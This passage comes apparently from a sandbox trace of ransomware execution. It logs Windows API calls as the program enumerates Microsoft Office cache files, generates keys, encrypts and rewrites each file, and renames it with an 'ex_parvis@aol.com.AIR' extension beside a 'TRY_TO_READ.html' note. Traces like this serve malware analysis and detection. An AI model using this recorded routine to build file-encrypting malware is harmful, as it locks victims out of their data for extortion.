lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.303] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.303] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4cf) returned 0x387410 [0136.303] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4cf) returned 0x3878e8 [0136.303] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.303] ReadFile (in: hFile=0x488, lpBuffer=0x387410, nNumberOfBytesToRead=0x4cf, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x4cf, lpOverlapped=0x0) returned 1 [0136.303] SetFilePointer (in: hFile=0x488, lDistanceToMove=-1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.303] WriteFile (in: hFile=0x488, lpBuffer=0x3878e8*, nNumberOfBytesToWrite=0x4cf, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3878e8*, lpNumberOfBytesWritten=0x2acf9c8*=0x4cf, lpOverlapped=0x0) returned 1 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3878e8 | out: hHeap=0x2e0000) returned 1 [0136.304] CloseHandle (hObject=0x488) returned 1 [0136.304] GetProcessHeap () returned 0x2e0000 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0136.304] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0136.304] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0136.304] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0136.304] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0136.305] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.305] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.305] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", dwFileAttributes=0x80) returned 1 [0136.306] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 79 [0136.306] GetProcessHeap () returned 0x2e0000 [0136.306] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x104) returned 0x387410 [0136.306] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" [0136.306] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0136.306] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.308] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488 [0136.308] GetProcessHeap () returned 0x2e0000 [0136.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.308] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3124224) returned 1 [0136.308] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2fac00 [0136.309] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.309] GetProcessHeap () returned 0x2e0000 [0136.309] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.309] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.309] WriteFile (in: hFile=0x488, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.311] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.311] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.311] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2fac00) returned 0x30d0020 [0136.311] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2fac00) returned 0x33d0020 [0136.312] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.312] ReadFile (in: hFile=0x488, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x2fac00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x2fac00, lpOverlapped=0x0) returned 1 [0136.466] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0136.466] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0136.466] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", dwFileAttributes=0x80) returned 1 [0136.466] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 73 [0136.466] GetProcessHeap () returned 0x2e0000 [0136.466] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x387410 [0136.466] lstrcpyW (in: lpString1=0x387410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" [0136.466] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0136.466] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0136.469] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x488 [0136.469] GetProcessHeap () returned 0x2e0000 [0136.469] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x387410 | out: hHeap=0x2e0000) returned 1 [0136.469] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=18874884) returned 1 [0136.469] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1200204 [0136.469] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0136.469] GetProcessHeap () returned 0x2e0000 [0136.469] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0136.469] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0136.469] WriteFile (in: hFile=0x488, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0136.471] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0136.471] WriteFile (in: hFile=0x488, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0136.471] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1200204) returned 0x30d0020 [0136.472] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1200204) returned 0x42e0020 [0136.473] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.473] ReadFile (in: hFile=0x488, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x1200204, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1200204, lpOverlapped=0x0) returned 1 [0137.620] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e018 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.621] GetLastError () returned 0x0 [0137.621] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.621] GetLastError () returned 0x0 [0137.621] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.621] GetLastError () returned 0x0 [0137.621] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971f6d10, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971f6d10, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971f6d10, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0137.621] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.621] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.622] GetLastError () returned 0x0 [0137.622] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.622] GetLastError () returned 0x0 [0137.622] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.622] GetLastError () returned 0x0 [0137.622] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328e80 [0137.622] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0137.622] GetLastError () returned 0x0 [0137.622] FindNextFileW (in: hFindFile=0x35e018, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0137.622] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0137.622] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0137.622] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0137.622] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", dwFileAttributes=0x80) returned 1 [0137.626] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 76 [0137.626] GetProcessHeap () returned 0x2e0000 [0137.626] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0137.626] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" [0137.626] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0137.626] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0137.629] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c [0137.629] GetProcessHeap () returned 0x2e0000 [0137.629] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0137.629] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=9503) returned 1 [0137.629] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x251f [0137.629] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0137.629] GetProcessHeap () returned 0x2e0000 [0137.629] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0137.629] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0137.629] WriteFile (in: hFile=0x48c, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0137.631] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0137.631] WriteFile (in: hFile=0x48c, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0137.631] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x251f) returned 0x387410 [0137.632] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x251f) returned 0x389938 [0137.632] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.632] ReadFile (in: hFile=0x48c, lpBuffer=0x387410, nNumberOfBytesToRead=0x251f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x387410*, lpNumberOfBytesRead=0x2acf9c8*=0x251f, lpOverlapped=0x0) returned 1 [0137.632] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 